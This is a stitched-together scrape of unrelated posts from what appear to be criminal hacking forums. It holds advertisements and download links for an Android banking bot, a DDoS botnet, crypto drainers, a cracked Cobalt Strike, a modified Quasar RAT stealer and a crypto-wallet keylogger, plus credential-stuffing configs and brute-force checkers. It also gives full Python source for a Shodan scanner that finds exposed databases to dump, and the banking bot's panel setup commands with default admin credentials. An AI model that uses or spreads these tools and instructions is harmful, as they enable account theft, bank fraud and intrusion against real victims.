BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RDP, VNC with Hydra, Medusa and Ncrack - GitHub - GitHackTools/BruteDum: BruteDum - Brute Force attacks SSH, FTP, Telnet, PostgreSQL, RD...
github.com
Хотим предложить бота собственной разработки.
Совершенно новый движок бота, учтены пожелания клиентов, часть функций
автоматизировано, расширенный функционал.
Возможности бота:
- Грабер карт
- Инстал apk
- Спам по контактам пользователя
- Вызов номера
- Переадресация входящих звонков
- Запуск приложений пользователя
- Автоматический вывод фейк уведомления, с взятыми иконками банков
- Перехват,блок-удаление входящих SMS, отправка, в том числе и на короткие
номера
- Скачать все названия приложений пользователя
- Грабер контактов
- Скрин локер
- Запуск страниц в браузере
- Запуск приложений пользователя
- Поиск Банк приложений
- Грабер истории браузера
- Модуль socks5
- Спам по базе номеров
- Отправка USSD
- Убийство бота с отключением админ прав
- Геолокация
- Авто ответ смс
Админ панель:
Подробная статистика по странам,app,url хистори, селерам и т.д.
Возможность выдать команды конкретному боту, группе, а так же всем вновь
прибывшим.
Поиск по imei, сортировка по установленным приложениям, онлайн ботам, селерам,
странам.
Чистка старых логов.
Отдельная статистика для траферов.
Jabber уведомления.
Есть возможность загрузки своих инжектов, с админ панели.
Поиск по смс,логам.
Поиск линков по хистори.
Статистика по заданиям какие выданы, выполнены.
И т.д.
Доп инфо:
Размер бота 150 кб.
Стабильная работа на Android 4-7.
Для основной работы не требуются root права.
Запрос админ прав.
Для смены пароля телефона требуются админ права(запрашиваются при инстале).
Смена пароля до версии Android Nougat (Android 7) частично.
Отправка и перехват SMS на всех версиях, удаление до 4.4, скачка всех SMS от
4.4, блок SMS свыше 4.4 через SMS менеджер/Screen Locker(при блокировке через
SMS менеджер, SMS не видит только холдер).
Постоянный вывод банк (фейк) уведомлений с иконками банков, текст можно задать
с админ панели при нажатии на сообщение запускается инжект.
В наличии инжекты евро стран, идут в комплекте с ботом.
Скриншот|Screenshot
Инструкция на русском:
Spoiler: 3 у вас 43
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Панель администрации Локи устанавливает инструкции:
apt-get update && apt-get upgrade -y
apt-get install apache2 libapache2-mod-php5 mysql-server php5 php5-mysql -y
apt-get install default-jre default-jdk -y
Debian 7:
apt-get install ia32-libs lib32z1 lib32ncurses5 -y
Debian 8:
dpkg --add-architecture i386
apt-get update
apt-get install libstdc++6:i386 libgcc1:i386 zlib1g:i386 libncurses5:i386
lib32z1 lib32ncurses5
Следующий:
wget https://raw.githubusercontent.com/iBotPeach...apktool
wget -O apktool.jar https://bitbucket.org/iBotPeaches/apktool/d....4.jar
chmod +x ~/apktool.jar
chmod +x ~/apktool
mv ~/apktool.jar /usr/local/bin/
mv ~/apktool /usr/local/bin/
Следующий:
распакуйте loki.tar в новый каталог. что-то вроде этого: tar xf loki.tar -C /
var / www /
изменить владельца файлов: chown -R www-data: www-data / var / www /
Запустите: mysql
создайте базу данных loki;
предоставьте все привилегии на loki.* на loki@localhost определил
'DB_PASSWORD'; предоставьте все привилегии на loki.* на loki@localhost
определен 'DB_PASSWORD';
выйти.
файл loki4dev.sql BD импорта:
MySQL Локи < /var/www/site/ Локи 4dev.sql MySQL вы pbolonka1 < /var/www/site/loki4dev.sql корень - Локи
Править:/var/www/site/db.php и входят в mysql доступ к базе данных:
db: loki
db user: loki
db password: DB_PASSWORD
Готово!
Панель администрации адреса http://domain/site/ или http://ip_server/site/
логин с именем bot4fun и пароль J1HPbmr
Только в образовательных целях - [скачать](https://mega.nz/#!BqQCEQrC!HiIUJRSF2VRlDhe- EdUUykHbz6rv7F2qEyZeN8j0p4s)
[CLIKE]
i nsta B0T
You must spend at least 200 day(s) on the forum to view the content.
не проверенная функция попала в соседний дом
](https://anonfile.com/YbS1fbw4nf/insta_bot_rar)
anonfile.com
](https://www.virustotal.com/gui/file/4301ec2e9592e7a22262d1c046954545033b73be322b33a8117d201556c4254b/detection)
VirusTotal
www.virustotal.com
[/CLIKE]
[![](/proxy.php?image=https%3A%2F%2Fraw.githubusercontent.com%2FWZTNet%2FAnony-
Upload-
Center%2Fmaster%2Fshot.jpg&hash=8ef6ecb7a0f0dbf4752445f06316b93b)](https://raw.githubusercontent.com/WZTNet/Anony-
Upload-Center/master/shot.jpg)
upload your file from local or remote to anonymous drive for permanently.
Features
Download Checker: http://bit.ly/2TXIzoJ
Tutorials:
3)VirusTotal: https://www.virustotal.com/gui/file...869e6ea9372f1bb5d877864d2b543ee5c04/detection
Доброго времени суток.
Давно пользую один отличный парсер, который позволяет с помощью Shodan
получить список баз, которые можно сдампить, за несколько секунд.
Не стоит недооценивать мощь Shodan, так как misconfiguration одна из самых
больших уязвимостей на целевой системе.
Скрипт позволяет собирать данные по следующим базам данных:
Elastic
CouchDB
MongoDB
Kibana (Elastic interface)
Исходных код можно модифицировать за считанные минуты, добавить процессинг и
подключить чекеры.
В моем случае я добавил дампинг данных с корп. почт.
Исходный код:
Python:Copy to clipboard
from hurry.filesize import size
from colorama import Fore
import json
import shodan
import sys
import argparse
description = r"""
,
)\
/ \
' # '
', ,'
`'
,
)\
/ \
' ~ '
', ,'
`'
LeakLooker - Find open databases
https://medium.com/@woj_ciech https://github.com/woj-ciech/
Example: python leaklooker.py --mongodb --couchdb --kibana --elastic --first 21 --last 37"""
print (description)
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter #added to show default value
)
group = parser.add_argument_group("Pages")
parser.add_argument("--elastic", help="Elasti search", action='store_true')
parser.add_argument("--couchdb", help="CouchDB" ,action='store_true')
parser.add_argument("--mongodb", help="MongoDB", action='store_true')
parser.add_argument('--kibana', help='Kibana', action='store_true')
group.add_argument('--first', help='First page', default=None, type=int)
group.add_argument('--last', help='Last page', default=None, type=int)
args = parser.parse_args()
elastic = args.elastic
couchdb = args.couchdb
mongodb = args.mongodb
kibana = args.kibana
first = args.first
last = args.last
if first and last is None:
print ("Correct pages")
sys.exit()
elif last and first is None:
print ('Correct pages')
sys.exit()
elif first is None and last is None:
print ("Choose pages to search")
sys.exit()
elif first > last:
print ('Correct pages')
sys.exit()
else:
last = last+1
SHODAN_API_KEY = ''
query_elastic = 'product:elastic port:9200 '
query_mongodb = 'product:MongoDB '
query_couchdb = "product:couchdb "
query_kibana = "kibana content-length: 217 "
def shodan_query(query, page):
try:
api = shodan.Shodan(SHODAN_API_KEY)
result = api.search(query, page=page)
except shodan.APIError as e:
print (Fore.RED + e.value + Fore.RESET)
return False
if len(result['matches']) > 0:
print ('Found ' + str(result['total']) + " results")
else:
print ("Nothing was found")
return False
return result
def check_elastic(results):
if results:
for service in results['matches']:
try:
if service['elastic']['cluster']['indices']['store']['size_in_bytes'] > 217000000:
print ("IP: http://" + Fore.LIGHTGREEN_EX + service['ip_str'] + ':' + str(service['port']) + '/_cat/indices?v' + Fore.RESET)
print ("Size: "+ Fore.LIGHTGREEN_EX + size(service['elastic']['cluster']['indices']['store']['size_in_bytes']) + Fore.RESET)
try:
print('Country: ' + Fore.LIGHTBLUE_EX + service['location']['country_name'] + Fore.RESET)
except:
print ('Country: ' + Fore.RED + 'Unknown' + Fore.RESET)
print ("Indices: ")
for indice,info in service['elastic']['indices'].items():
print (Fore.GREEN + indice + Fore.RESET)
print ("-----------------------------")
except KeyError:
pass
def check_mongodb(results):
if results:
for service in results['matches']:
try:
if service['mongodb']['listDatabases']['totalSize'] > 217000000:
print ("IP: " + Fore.LIGHTBLUE_EX + service['ip_str'] + Fore.RESET)
print ("Size: " + Fore.LIGHTBLUE_EX + size(service['mongodb']['listDatabases']['totalSize']) + Fore.RESET)
try:
print('Country: ' + Fore.LIGHTBLUE_EX + service['location']['country_name'] + Fore.RESET)
except:
print ('Country: ' + Fore.RED + 'Unknown' + Fore.RESET)
for database in service['mongodb']['listDatabases']['databases']:
if database['empty'] != 'true':
print ("Database name: " + Fore.BLUE + database['name'] + Fore.RESET)
print("Size: " + Fore.BLUE + size(database['sizeOnDisk']) + Fore.RESET)
print ('Collections: ')
for collection in database['collections']:
print (Fore.LIGHTBLUE_EX + collection + Fore.RESET)
print ("-----------------------------")
except KeyError:
pass
def check_couchdb(results):
if results:
for service in results['matches']:
try:
data = service['data']
if "200 OK" in data:
response = data.splitlines()
for line in response:
if line.startswith("{"):
json_data = json.loads(line)
if len(json_data['dbs']) < 20 and 'compromised' not in service['tags']:
print ("IP: http://" + Fore.YELLOW + service['ip_str'] + ':' + str(service['port']) + '/_utils' + Fore.RESET)
try:
print('Country: ' + Fore.LIGHTBLUE_EX + service['location'][
'country_name'] + Fore.RESET)
except:
print('Country: ' + Fore.RED + 'Unknown' + Fore.RESET)
for db in json_data['dbs']:
print (Fore.LIGHTYELLOW_EX + db + Fore.RESET)
print ("-----------------------------")
except KeyError:
pass
def check_kibana(results):
if results:
try:
for service in results['matches']:
if "200 OK" in service['data']:
print("IP: http://" + Fore.CYAN + service['ip_str'] + ':' + str(
service['port']) + '/app/kibana#/discover?_g=()' + Fore.RESET)
try:
print('Country: ' + Fore.LIGHTBLUE_EX + service['location']['country_name'] + Fore.RESET)
except:
print ('Country: ' + Fore.RED + 'Unknown' + Fore.RESET)
print ('---')
print ('---')
except:
pass
if elastic:
for page in range (first,last):
print (Fore.RED + '----------------------------------Elastic - Page ' + str(page) + '--------------------------------' + Fore.RESET)
elastic_results = shodan_query(query_elastic, page)
check_elastic(elastic_results)
if couchdb:
for page in range (first,last):
print (Fore.RED + '----------------------------------CouchDB - Page ' + str(page) + '--------------------------------' + Fore.RESET)
couchdb_results = shodan_query(query_couchdb, page)
check_couchdb(couchdb_results)
if mongodb:
for page in range (first,last):
print (Fore.RED + '----------------------------------MongoDB - Page ' + str(page) + '--------------------------------' + Fore.RESET)
mongodb_results = shodan_query(query_mongodb, page)
check_mongodb(mongodb_results)
if kibana:
for page in range (first,last):
print (Fore.RED + '----------------------------------Kibana - Page ' + str(page) + '--------------------------------' + Fore.RESET)
kibana_results = shodan_query(query_kibana, page)
check_kibana(kibana_results)
Программа для накрутки на стрим (Youtube)
Продам программу для накрутки зретелей на стрим ютуб . (новая версия)
-Онлайн поднимается и падает постепенно
-На паблик проксях можно держать от 200 до 2к людей на стриме, при желании можно запустить несколько программ.
-Были случаи вывода в топ трансляций на ютубе, приходили и живые люди.
Для накрутки надо только ссылка на стрим.
После получение я ваш саппорт по пользованию программы.
После получение софта - манибэк не делаю.
Любой слив софта = бан.
Также есть тема https://********.net/threads/767650/
ЦЕНА: 1ООО РУБЛЕЙ НА ВСЕГДА
Писать по контактам тг nikrud131
Привет народ. Кто в курсе, и видел мои топы на других форумах, заметил, что я
решил занятся самоделками валидными, с бывшего валида, либо с дампов.
И решил для форумачан, сделать топ, где я буду делиться конфигами для создания
баз.
В основном конфиги будут под софт от старлея, мейлбилдер, но так же буду
добавлять правила для лудомании.
Ну и первый подгон для ребят, и для разминки рук, вот конфиг от Кастета, который продавался за 20к рубасей на брут форумах.
Тема будет добавляться различнми конфигами, можем в теме обсуждать у кого что зашло, под бугор мур либо дампы, либо с раздач или пабл АПов.
](https://www.sendspace.com/file/is96zk)
Free file hosting. Email large files for free.
www.sendspace.com
Забыл добавить правило настроек для самоделок под этот пак конфигов,
Обязательно сортируйте пароли своих баз перед парсингом иначе получиться КАША.
На примере Объясню. ( Коротко )
ella.barskaya@inbox.ru:1830736
1830736 ( Пароль которой сосотоит их одних ЦИФР) Такие пароли нужно
переделывать с помощью KFG ПАРОЛИ (ЦИФРЫ)
ella.belozerova@mail.ru:compaq123456
compaq123456 ( Пароль которой сосотоит их одних ЦИФР+БУКВЫ) Такие пароли нужно
переделывать с помощью KFG ПАРОЛИ (БУКВЫ+ЦИФРЫ)
ну вы поняли да? разберетесь, там 2 папки, не суйте базу в перемешку, отсеивайте, где только цифры, а где буквы и цифры
Пробовал запускать программу,вроде ищет,правда нужна регистрация на
сайте,возможно будет интересно,вроде поиском не нашел тут на форуме,если есть,
удалите тему пожалуйста. Да сделал повторное VT ,файл оказался не настолько
чистым,как уверял автор...
Cама программа:
https://mega.nz/#!PlJSGCIK!HOMuP9yJM2KfbH0UmfIxBLscVx2M4eXgNu_H5T-ng0k
VT :
https://www.virustotal.com/ru/file/...11f54be94befd2c381304734/analysis/1552335999/
Приветствую. На форуме в основном выкладывают ссылки на разные ФО и порой
качать их бывает нудно и долго.
В связи с этим я написал софт который будет в автоматическом режиме скачивать
файлы с популярных файло-обменников.
Ссылки должны быть в urlList.ini
Поддерживаемые ФО
anonfile.com
anonfiles.com
dropmefile.com
dropmefiles.com
nofile.io
finndev.net
upload.ee
zippyshare.com
mediafire.com
sendspace.com
rgho.st
cloud.mail.ru
yadi.sk
pastebin.com
Spoiler: Особенности ФО и софта.
anonfile.com
-В отдельный файл ссылки с вирусами.
mediafire.com
-В отдельный файл ссылки на скачку папок.
dropmefiles.com
-В отдельный файл ссылки с паролем.
nofile.io
-В отдельный файл ссылки с флагом protected.
-В отдельный файл ссылки с флагом decrypt.
-В отдельный файл ссылки с флагом password.
rgho.st
-В отдельный файл ссылки с паролем.
sendspace.com
-В отдельный файл ссылки на filegroup.
-В отдельный файл ссылки с капчей.
-Теперь качает и с мобильной версии (m.sendspace.com).
cloud.mail.ru
-Все файлы скачиватся в архивах.
-В отдельный файл ссылки размером больше 4Gb
pastebin.com
-В отдельную папку {path}\Downloads\pastebin
zippyshare.com - ничего особенного.
upload.ee - ничего особенного.
finndev.net - ничего особенного.
google.drive.com - в планах
dropbox.com - в планах.
mega.nz - не вижу смысла. Есть их приложуха удобная + с премом скачка без
ограничений. Или используйте mipony
Все файлы скачиваются в отдельную папку {path}\Downloads
Если на диске существует имя файла, то оно переименовывается добавляя
порядковый номер.
Hidden content for authorized users.
кто пользовался данным по ссылчку в личку можете закинуть)))))))))))))))
![](/proxy.php?image=https%3A%2F%2Flaptopsmagazine.com%2Fwp- content%2Fuploads%2F2017%2F12%2F1513266294_salesforce-red-team-members- present-tool-at-defcon-get- fired-660x330.jpg&hash=bfdf7b3236d49492ee118ec61c017e2a)
Среда для выполнения и анализа зловредов с возможностью записи сессии.
Сам есче не тестил, и относительно не давно узнал о существовании этого софта,
так сказать делюсь инфой.
Ееси кто юзал, отзывы приветствуются.
---------------------------------------------
Почитать https://any.run
Рега https://app.any.run/#register
----------------
Примеры:
https://app.any.run/tasks/32186bb2-60c2-4980-8bf8-4b2742697df4
https://app.any.run/tasks/266ab3c4-c346-4f5b-813b-d5e82ea67aed
---------------------------------------------------------------------------
Brute/Checker Mojang by Niteks3
Ограничение в 300 потоков
Не рекомендуется использовать без прокси
Secured - +
Email Verified - +
Blocked - -
==========<Good_Account>==========
Ваши пожелания можете выражать в теме или же прямиком
Мне в телеграмм
Найденные вами баги будут в скором
исправлены
Скачать
You must have at least 299 reaction(s) to view the content.
Заказать приватный софт
Telegram - @Niteks3
(Кликабельно)
http://hellknights.void.ru/old/0x48k-archive-v1.tar 404
Может кто-нибудь перезалить этот файл. Cпасибо.
Народ подкиньте пожалуйсто консольный TCP / SYN / HTTP флудр(досер), просто каждый день наламываю по 30-50 дедиков, есть мысль как их использовать :lol2: (главное что бы был с консольным интерфейсом)
Warbot Version 1.1.1011
•Extremely stable DDoS (HTTP, TCP, UDP) with automatic and manual throttle
control
•Small bot size, it's only ~13 kilobytes
•Coded in pure C and assembler for speed and reliability
•Has no dependencies other than standard Windows DLLs
•UAC Bypass
•Works on Windows 7 AND Windows Vista
•Extremely stable bot altogether, error tolerant
•Lightweight installation process
The control panel has the following features:
•Fully featured Desktop Environment and easy to use too!
•Icon positions save!
•Complete Windows
•Live statistics view of your botnet army (updates every 60 seconds)
•Requires very little bandwidth! This means you won't need to pay for a host
if you don't want to!
•Well coded, OOP PHP. The source is very well written, you'd like it.
•Warbot is very secure. No XSS vulnerabilities. No authentication bypasses. No
backdoors.
Spoiler: 50
СКАЧАТЬ
passAMAGELAB
П.С. Сам пока не проверял, но вроде чистый.. (ОСТОРОЖНОСТЬ не помешает)
Давайте обсудим эту замечательную, во всех смыслах must have операционную
систему для пентестера/исследователя.
Для тех, кто первый раз слышит о Кали - небольшой вводный мануал , на русском
без регистрации и СМС: https://proglib.io/p/kali-linux-hacker/
всем привет
туфиш обронил сурсы которые продаёт сейчас за 22.000$
делюсь с миром.
внутри все интеграции вкл автослив на маркет соседнего борда и тд
Spoiler: ссылки на скачивание исходника
You must have at least 20 reaction(s) to view the content.
VT: https://www.virustotal.com/gui/file/045844f0eefb86b1183cda6418c4656ef923eff4947305d2b69b9e22b53c7472
АВ удалил архивные файлы, найти на данный момент актуальную ссылку реально проблематично, будто отовсюду его почистили. Прошу людей скинуть у кого есть крякнутая версия в ЛС или тут для всеобщего обозрения.
Автор:
disc0verer
Источник: xss.is
Доброго времени суток, многоуважаемые пользователи форума. Посвящаю вам свою
первую публикацию, принимая участие в конкурсе.
Данный софт представляет собой модуль кейлогера, который я использую в своём
более объёмном решении, поэтому серверная часть написана в формально-
демонстративном виде, для того чтобы рядовой пользователь мог просто запустить
программу и протестировать её на практике. Анти -вм, -дебаг, -анализ,
шифрование строк и прочее я оставляю на размышление, так как это слишком
индивидуальные параметры и каждый имплементирует то, что ему нужно.
Проблема.
Представим ситуацию, когда вы успешно заразили жертву малварём и даже нашли
какое-то расширение типа метамаск. Что дальше, как достать пароль и получить
доступ? Тут два основных пути - брутфорс или кейлогер.
Брутфорс:
- авторский, хороший софт обойдётся вам в копейку
- ресурсозатратно
- вероятность того, что получится подобрать пароль используя словарь или
пойманный autofill - крайне мала
Кейлогер:
- просто куча мусора, за исключением десктопных кошельков
Решение.
Кейлогер, который сможет ловить ввод пользователя для конкретного расширения
или кошелька и в конечном итоге выдавать лог вида 'extension_name:password'.
CryptoKiller - кейлогер следующего поколения, в данный момент заточенный под крипто расширения и кошельки. Смысл его существования в том, что он решает огромную проблему подбора паролей к пойманному wallet.dat или extension.ldb. Более того, он вполне может поставить жирную точку на существовании брутфорса, если вы готовы к тому чтобы ваш пейлоад находился в системе жертвы продолжительное время.
Spoiler: Работа расширений
Из-за того, что расширения функционируют полностью внутри песочницы браузера и
взаимодействуют с внешним миром через External API, они не создают каких-либо
видимых окон, которые можно индексировать. К примеру, результатом вызова
функции GetForegroundWindow() будет активная вкладка браузера, но не окно
расширения.
Примерно так, без заголовка, выгядит окно любого расширения через Spy++
Spoiler: Работа софта
CryptoKiller использует драйвер procmon.sys для мониторинга процессов и
событий на kernel-уровне, аналогично Process Monitor.
Для коммуникации с драйвером используется публичная C++ библиотека
openprocmon SDK. В Release версии
проекта она немного урезана в пользу размера и управления памятью, убраны
логи.
В качестве триггера для запуска кейлогерра используется событие, когда
расширение пытается подгрузить файлы для своей корректной работы. В
большинстве случаев можно словить момент не только запуска, но и успешного
входа пользователя. Если же у расширения не существует триггера на вход, то
подразумевается, что пользователь должен войти в кошелёк на протяжении какого-
то времени. Это применимо к Coin98 Wallet, Coinbase Wallet и другим с
параметром logReadable = FALSE (см. сорц код).
На выходе мы имеем пароль от кошелька без лишнего мусора:
Возможности применения низкоуровневого мониторинга событий - безграничны.
Поэтому с нетерпением жду здоровой критики или новых идей для применения.
Надеюсь, что этот софт и сама идея значительно облегчат вам жизнь)
P.S. Если кто-то найдёт применение софта в своём коммерческом продукте, не
забывайте про кошелёк для
донатов
Spoiler: Source code
- требуются права администратора
- логи отправляются сразу на сервер
![mega.nz](/proxy.php?image=https%3A%2F%2Fmega.nz%2Frich- file.png&hash=ce6c0b08146c0d238bfdc2b2470d7b21&return_error=1)
](https://mega.nz/file/9S9xTZ5B#oqVnuR_LdzUacnChUeC7rt7g-E22YyB1FsE3n06nQqE)
mega.nz
Пароль от архива: xss.is
Слив очередного дрейнера
Spoiler: Скачать
You must have at least 25 reaction(s) to view the content.
P.s: Советую код хорошо проверить, и контракты с которыми взаимодействует, а так же модули которые использует.
Поделитесь софтом, для проведения DDoS атак.
В целом интересно это направление, нужна информация, как их проводить, что
нужно сделать, учитывать?!
Буду благодарен за помощь.
Предусматриваю вложения в данное направление.
Буду благодарен за любую информацию.
Всем привет, в общим решил сюда закинуть типа копии ~~lolz~~ она похожа но не настолько как сам ранее упомянутый школа форум.
Spoiler: Скрины
Hidden content for authorized users.
Скажу как есть, денег убил и немного подшаманил его, но все же, использовать только для парсера почт и т.д., просмотр всех файлов которые там, в общим сами разберетесь что делать.
Spoiler: Мини инструкция
Hidden content for authorized users.
Через notepad++ открываем любой файл и все что связано в самой папке с hack-
lair.com заменяем на свой форум, так же и в БД/
Открываем CGCore > config.gt и заменяем данные от бд на свои.
Данные админа
login - hacklair
pass - hacklair
Spoiler: Скачать
Hidden content for authorized users.
На VT лень кидать, еще и инет ск бо бо rar архив без пароля, внутри БД
Скачать - ТУТА
Всем удачи, ушел, вернусь завтра со статьей
Can anyone share the latest version of MS Drainer? I see a lot of people selling MS drainer in this forum and elsewhere as their drainer and selling it for several thousand dollars. They are profiteering and making a lot of money. The old version Ms Drainer in this forum is from May, the new version is probably from July.
Login:pass базы
Вывод от 14trx (2$)
You must have at least 12 reaction(s) to view the content.
Anyone can recommend some Android based bulk sms senders that can support
.xls,.csv input of data,have latency and etc ?
It would be better if it works for older models of android or newer are
better?
Leave a reply in this topic or send me a pm.
Ideco Internet Control Server 2.5
![](/proxy.php?image=http%3A%2F%2Fwww.ideco- software.ru%2Fimages%2Fbox_photo_web.jpg&hash=09a624b8332133c0a80d20243e29c95f)
Ideco Internet Control Server 2.5 – это универсальная система доступа в Интернет для предприятия любого масштаба. Ideco ICS обеспечивает качественный доступ в Интернет всем пользователям, делает работу с Интернет управляемой и безопасной.
Сегодня пришел диск по почте, вот я и решил написать на форуме.
На диске документация, дистрибутив Linux с интегрированой системой Ideco
Internet Control Server 2.5 и утилиты администратирования.
Собственно я оценил эту систему, мне все понравилось.
Оценочная версия (работает 70 дней):
[Скачать|Download](http://www.ideco-
software.ru/products/trial.aspx?type=Download)
:zns1: [Заказать CD почтой БЕСПЛАТНО](http://www.ideco-
software.ru/products/trial.aspx?type=CD)
:zns2: Официальный сайт
:zns2: [Более подробное описание](http://www.ideco-
software.ru/products/overview.html)
:zns4: Купить|Buy
З.Ы. Не знал в какой раздел все это дело записать (*NIX, Софт или Сети), решил всетаки что лучше в сети.
Cracked release of Cobalt Strike 4.9
Spoiler: Download
![gofile.io](/proxy.php?image=https%3A%2F%2Fgofile.io%2Fdist%2Fimg%2Flogo- small-og.png&hash=32429581fada6ae1887e27dfa99f76aa&return_error=1)
0 downloads
gofile.io
https://transfer.sh/WxMgkUjufd/CS_49.zip
![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/a6a23f1c51646d76/#FKNAvJylNdWtTccuCjAUKA)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
https://www.sendspace.com/file/kqrhf5
PS: credits to pwn3rzs
**Quasar Bot Modified By - **Mr Malfoy
**What did i change?
Plugin System **
HVNC Module
Recovery {Chromium-Based Browsers, Firefox-Based Browsers, Internet Explorer}
(Passwords, Credit Cards, Cookies, History, Autofill, Bookmarks)
Enhanced Clipper + Keylogger
Improved Data Recovery
Spoiler
System Information (Version, CPU, GPU, RAM, IPs, BSSID, Location, Screen
Metrics, Installed Apps)
Saved WiFi Networks & Scans around Device (SSID, BSSID)
File Grabber (Documents, Images, Source Codes, Databases, USB)
Detection of Banking & Cryptocurrency Services in Browsers
Gaming Sessions (Steam, Uplay, Battle.Net, Minecraft)
Screenshots (Desktop & Webcam)
VPN Clients (ProtonVPN, OpenVPN, NordVPN)
Crypto Wallets
Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, AtomicWallet,
Guarda, Coinomi, Litecoin, Dash, Bitcoin, etc.
Browser Crypto Wallet Extensions (Chrome & Edge)
Binance, Coin98, Phantom, Mobox, XinPay, Math10, Metamask, BitApp,
Guildwallet, Iconex, Sollet, Slope Wallet, Starcoin, Swash, Finnie, KEPLR,
Crocobit, OXYGEN, Nifty, Liquality, Auvitas Wallet, Math Wallet, MTV Wallet,
Rabet Wallet, Ronin Wallet, Yoroi Wallet, ZilPay Wallet, Exodus, Terra
Station, Jaxx, etc.
Messaging Sessions, Accounts, Tokens
Discord, Telegram, ICQ, Skype, Pidgin, Outlook, Tox, Element, Signal, etc.
Directory Structure
FileZilla Hosts
Process List
Product Key
I have made these modifications and will continue to support and update this software as a part of our efforts to provide clean Tools for the community. so it would help us if you guys give suggestions and info about potential bugs you would encounter using this tool
Regards
**Agile Wizards
Donations would be appreciated **
bc1qcw652pkjjcgveyst457336za8mepd4k4t5p2ay [BTC]
0x2E14e830eA5AeeF3e4C4e4F3140a6F6a648Dc2F1 [ETH]
Download here
Hello I want to share with you this tool.
Latest version:
https://mega.nz/file/IedhVTRS#i52bBJeLyvsOijPIdCwWu1aG98E1M8qdeVYkvCZVTzQ
Old version:
https://mega.nz/file/1ek3RTxZ#gaFDBxvgI46_6mYH4DJuTS5gptGEgZC4spVFkVHaMLM
Password: xss.is
Credit to: Pwn3rzs
Всем привет! Наткнулся на исходинк, вроде то...
Не могу собрать, ошибки и варненги. Помогите, подскажите кто чем может.
Code:Copy to clipboard
1>------ Перестроение всех файлов начато: проект: SpyNote V6.4, Конфигурация: Debug Any CPU ------
1>C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\MSBuild\Current\Bin\Microsoft.Common.CurrentVersion.targets(2084,5): warning MSB3245: Не удалось разрешить данную ссылку. Не удалось обнаружить сборку "CoreAudioApi". Убедитесь, что сборка существует на диске. Если данная ссылка требуется в коде, это может вызвать ошибки компиляции.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\AccountManager.vb(3,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.Sockets.SpyNote.Client", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\AccountManager.vb(4,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.SpyNote.Stores", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\FileBox.Designer.vb(616,23): warning BC40004: WithEvents variable "Size" конфликтует с "property" в базе Size "class" Form и должен быть объявлен "Shadows".
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\Sockets.SpyNote.Server\SocketServer.vb(3,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.My", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\Sockets.SpyNote.Server\SocketServer.vb(4,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.Sockets.SpyNote.Client", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\Sockets.SpyNote.Server\SocketServer.vb(5,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.SpyNote.Stores", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\Sockets.SpyNote.Server\SocketServer.vb(6,9): warning BC40056: Пространство имен или тип, указанный в Imports "SN.SPYXml", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\SpyNote.Stores\SampleAudioAPI.vb(2,9): warning BC40056: Пространство имен или тип, указанный в Imports "CoreAudioApi", не содержит открытый член или не может быть найден. Убедитесь, что пространство имен или тип заданы и содержат хотя бы один открытый член. Убедитесь, что импортируемое имя элемента не использует псевдонимы.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\SpyNote.Stores\SampleAudioAPI.vb(79,32): error BC30002: Тип "MMDevice" не определен.
1>C:\Users\Alexey\Desktop\RAT\Spy Note\SpyNote V6.4 Source\SpyNote V6.4\SpyNote V6.4\SN\SpyNote.Stores\SampleAudioAPI.vb(81,27): error BC30002: Тип "MMDeviceEnumerator" не определен.
========== Перестроение всех проектов: успешно: 0, с ошибками: 1, пропущено: 0 ==========
Может не туда кликаю, сто лет не заходил в VS
Привет всем. Здесь будет ~~мой~~ топик о программе Textpipe pro , он скорее для новичков, но, возможно, и опытные что-то найдут здесь полезное.
